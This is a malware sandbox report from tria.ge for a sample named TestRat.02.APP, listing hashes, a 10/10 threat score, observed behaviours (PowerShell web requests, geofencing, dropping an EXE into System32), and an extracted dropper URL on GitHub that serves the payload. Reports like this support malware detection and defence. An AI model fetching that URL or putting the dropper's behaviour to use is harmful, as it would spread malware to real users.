Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    TestRat.02.APP.zip

  • Size

    91KB

  • Sample

    240722-vh84ssxerc

  • MD5

    4c92ac3b6123d6510273d7894067eefe

  • SHA1

    7723acd7093b7422cb8b074d0091f99afd4f32ed

  • SHA256

    285600cafa0475b557b8f722dcc4628b7e7780a593c69fec0954046a45272ee8

  • SHA512

    65c097000464ea02341a849125a786daf5e1a2ab12464b5a03af9ea23807796cd3c42ca8c862522bc4a8f0b881d54c27af75b30ba21153705feaf65b6bece3c3

  • SSDEEP

    1536:Z8yFhEizoLNrYHPepeOOayzavjOgPRHwwi21HwiuYhF3NKu:ZZFW4zvepek7PRji25w5Yhiu

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://github.com/Daulaires/Daulaires/releases/download/Lester/Demo.zip

Targets

    • Target

      TestRat.02.APP.dll

    • Size

      23KB

    • MD5

      b59778e44a2f95b038cb3482834dcc5e

    • SHA1

      42a34e81d0759d99277c1d52f79000854361f829

    • SHA256

      e74306f114ac629c7fb15bfcd512829743899f2793be9e48407382df6f29187e

    • SHA512

      fd317aabed56b4e9efdc60ae9f19a505adc3fe394559cc9f7fa7bbae17b0fea28097e5993d9096d64df79fa00bc9adba3d5d798f1c3ef89052bd0ba6c5e46fd6

    • SSDEEP

      384:25HGXComOhEroBdNR17IMTRVag6uhob5Ef87bo50P1IFVpqNb54M3KYJ7Oi+/:QSComOhEWdNAV5d7bJUS73tqD

    Score
    1/10
    • Target

      TestRat.02.APP.exe

    • Size

      139KB

    • MD5

      6d75b31bfa691bdf32c0c9331c8b7ff7

    • SHA1

      5387d89075eb924adca7318add02c0bca8812a9e

    • SHA256

      fb1e3c46ce349e7ae853621f708fe0bfa08e142b6f6262dc9ab6f8e03cb5380f

    • SHA512

      ca08fd9ed2543ff13167f57e27fe4fbb6a395161e25902b7c9ec562034f6cb9aa24f2a32c04341b5ac29c49bd683393856742bd0f400e2c0cc660760ab2b7b83

    • SSDEEP

      3072:CAi4pxpEHmAdx4/kyHRZa0YiRAl278IVn2JbS1cJA8lW7:CAi4pxpRkyHRZa0Gl278IVNc2cW

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks